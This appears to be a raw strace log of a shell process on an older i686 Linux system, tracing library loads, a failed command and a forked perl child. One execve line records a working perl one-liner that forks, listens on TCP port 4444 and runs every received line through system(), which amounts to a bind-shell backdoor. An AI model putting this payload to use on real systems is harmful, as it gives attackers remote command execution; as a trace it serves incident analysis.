11567 20:18:02.131793 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11567 20:18:02.131811 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11567 20:18:02.131836 socket(PF_FILE, SOCK_STREAM, 0) = 1
11567 20:18:02.131858 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11567 20:18:02.131878 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11567 20:18:02.131923 close(1)          = 0
11567 20:18:02.131962 socket(PF_FILE, SOCK_STREAM, 0) = 1
11567 20:18:02.131995 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11567 20:18:02.132041 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11567 20:18:02.132096 close(1)          = 0
11567 20:18:02.132139 open("/etc/nsswitch.conf", O_RDONLY) = 1
11567 20:18:02.132171 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
11567 20:18:02.132188 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8b000
11567 20:18:02.132213 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
11567 20:18:02.132279 read(1, "", 4096) = 0
11567 20:18:02.132289 close(1)          = 0
11567 20:18:02.132299 munmap(0xb7f8b000, 4096) = 0
11567 20:18:02.132317 open("/etc/ld.so.cache", O_RDONLY) = 1
11567 20:18:02.132330 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11567 20:18:02.132347 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f84000
11567 20:18:02.132384 close(1)          = 0
11567 20:18:02.132410 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.132429 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
11567 20:18:02.132443 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
11567 20:18:02.132531 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
11567 20:18:02.132548 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df6000
11567 20:18:02.132560 mmap2(0xb7dfd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dfd000
11567 20:18:02.132578 close(1)          = 0
11567 20:18:02.132589 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.132602 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
11567 20:18:02.132616 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
11567 20:18:02.132701 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
11567 20:18:02.132717 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dde000
11567 20:18:02.132728 mmap2(0xb7df2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7df2000
11567 20:18:02.132744 mmap2(0xb7df4000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7df4000
11567 20:18:02.132758 close(1)          = 0
11567 20:18:02.132784 munmap(0xb7f84000, 29913) = 0
11567 20:18:02.132801 open("/etc/ld.so.cache", O_RDONLY) = 1
11567 20:18:02.132813 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11567 20:18:02.132829 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f84000
11567 20:18:02.132839 close(1)          = 0
11567 20:18:02.132849 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.132918 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
11567 20:18:02.132951 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11567 20:18:02.133072 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
11567 20:18:02.133090 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd4000
11567 20:18:02.133101 mmap2(0xb7ddc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7ddc000
11567 20:18:02.133118 close(1)          = 0
11567 20:18:02.133130 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.133143 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
11567 20:18:02.133157 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11567 20:18:02.133244 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
11567 20:18:02.133260 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc9000
11567 20:18:02.133271 mmap2(0xb7dd2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd2000
11567 20:18:02.133288 close(1)          = 0
11567 20:18:02.133309 munmap(0xb7f84000, 29913) = 0
11567 20:18:02.133325 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
11567 20:18:02.133339 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
11567 20:18:02.133376 _llseek(1, 0, [0], SEEK_CUR) = 0
11567 20:18:02.133404 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
11567 20:18:02.133437 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f8b000
11567 20:18:02.133462 _llseek(1, 1624, [1624], SEEK_SET) = 0
11567 20:18:02.133476 munmap(0xb7f8b000, 1624) = 0
11567 20:18:02.133486 close(1)          = 0
11567 20:18:02.133514 getpgrp()         = 3831
11567 20:18:02.133524 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
11567 20:18:02.133539 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
11567 20:18:02.133556 brk(0x8101000)    = 0x8101000
11567 20:18:02.133587 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11567 20:18:02.133602 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11567 20:18:02.133616 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11567 20:18:02.133657 brk(0x8102000)    = 0x8102000
11567 20:18:02.133683 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11567 20:18:02.133701 stat64("/sbin/AB", 0xbf9fd858) = -1 ENOENT (No such file or directory)
11567 20:18:02.133713 stat64("/bin/AB", 0xbf9fd858) = -1 ENOENT (No such file or directory)
11567 20:18:02.133724 stat64("/usr/sbin/AB", 0xbf9fd858) = -1 ENOENT (No such file or directory)
11567 20:18:02.133736 stat64("/usr/bin/AB", 0xbf9fd858) = -1 ENOENT (No such file or directory)
11567 20:18:02.133749 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
11567 20:18:02.133763 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dff6f8) = 11568
11568 20:18:02.150252 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11568 20:18:02.150369 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
11568 20:18:02.150426 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
11568 20:18:02.150461 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
11568 20:18:02.150491 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11568 20:18:02.150519 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11568 20:18:02.150534 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
11568 20:18:02.150594 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
11568 20:18:02.150608 --- SIGPIPE (Broken pipe) @ 0 (0) ---
11568 20:18:02.150687 exit_group(127)   = ?
4519  20:18:02.289486 waitpid(11567,  <unfinished ...>
11567 20:18:02.320253 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11567 20:18:02.320349 --- SIGCHLD (Child exited) @ 0 (0) ---
11567 20:18:02.320385 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 11568
11567 20:18:02.320427 waitpid(-1, 0xbf9fd4d8, WNOHANG) = -1 ECHILD (No child processes)
11567 20:18:02.320452 sigreturn()       = ? (mask now [])
11567 20:18:02.320488 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
11567 20:18:02.320504 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11567 20:18:02.320515 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
11567 20:18:02.320528 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
11567 20:18:02.320547 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11567 20:18:02.320559 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
11567 20:18:02.320596 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11567 20:18:02.320617 stat64("/sbin/perl", 0xbf9fd888) = -1 ENOENT (No such file or directory)
11567 20:18:02.320629 stat64("/bin/perl", 0xbf9fd888) = -1 ENOENT (No such file or directory)
11567 20:18:02.320641 stat64("/usr/sbin/perl", 0xbf9fd888) = -1 ENOENT (No such file or directory)
11567 20:18:02.320652 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
11567 20:18:02.320671 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
11567 20:18:02.320696 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
11567 20:18:02.320711 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dff6f8) = 11569
11569 20:18:02.440669 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11569 20:18:02.440723 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
11569 20:18:02.440749 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
11569 20:18:02.440768 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
11569 20:18:02.440784 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11569 20:18:02.440801 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11569 20:18:02.440814 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
11569 20:18:02.440853 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
11569 20:18:02.440953 brk(0)            = 0x8153000
11569 20:18:02.440977 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.440995 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000
11569 20:18:02.441031 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.441050 open("/etc/ld.so.cache", O_RDONLY) = 1
11569 20:18:02.441063 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11569 20:18:02.441082 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7edc000
11569 20:18:02.441092 close(1)          = 0
11569 20:18:02.441103 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.441119 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11569 20:18:02.441133 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11569 20:18:02.441227 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11569 20:18:02.441245 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed8000
11569 20:18:02.441257 mmap2(0xb7eda000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eda000
11569 20:18:02.441274 close(1)          = 0
11569 20:18:02.441286 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.441300 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
11569 20:18:02.441314 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
11569 20:18:02.441404 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
11569 20:18:02.441421 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eb3000
11569 20:18:02.441432 mmap2(0xb7ed6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7ed6000
11569 20:18:02.441448 close(1)          = 0
11569 20:18:02.441460 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.441474 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1
11569 20:18:02.441488 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512
11569 20:18:02.441565 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0
11569 20:18:02.441603 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eb2000
11569 20:18:02.441653 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e9a000
11569 20:18:02.441678 mmap2(0xb7eae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7eae000
11569 20:18:02.441729 mmap2(0xb7eb0000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb0000
11569 20:18:02.441763 close(1)          = 0
11569 20:18:02.441775 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.441805 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
